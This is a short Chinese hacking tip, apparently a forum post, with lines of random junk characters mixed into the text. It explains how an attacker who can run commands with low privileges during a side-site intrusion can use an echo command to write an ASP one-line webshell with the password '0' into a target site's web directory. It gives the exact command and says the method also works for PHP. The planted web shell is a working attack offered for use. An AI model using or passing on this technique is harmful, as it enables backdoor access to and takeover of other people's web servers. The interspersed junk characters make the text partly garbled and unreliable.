在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
, L f2 ]' s) c, [7 ]5 W0 h
2 Z4 }; m" s+ E) T* D7 g命令格式- i# P J* U9 V; e" Q1 ]6 t
$ c6 q6 G( Z8 Q2 XEcho 语句 >目标站绝对目录, W9 \, `, ?6 O# c% d
5 V% ?5 k8 B. g+ d$ }2 V% W, b& T例如:
$ j% W" Y# B$ I, }" }1 L W- C' Q% N! s+ A9 [1 k% b- _
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
4 G* Q! \4 ^! |: D2 A0 H( V. _5 S; R# q G/ \' E: G* ^6 z
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
/ ^+ c5 K4 p1 S1 b2 \' c- E2 e1 } |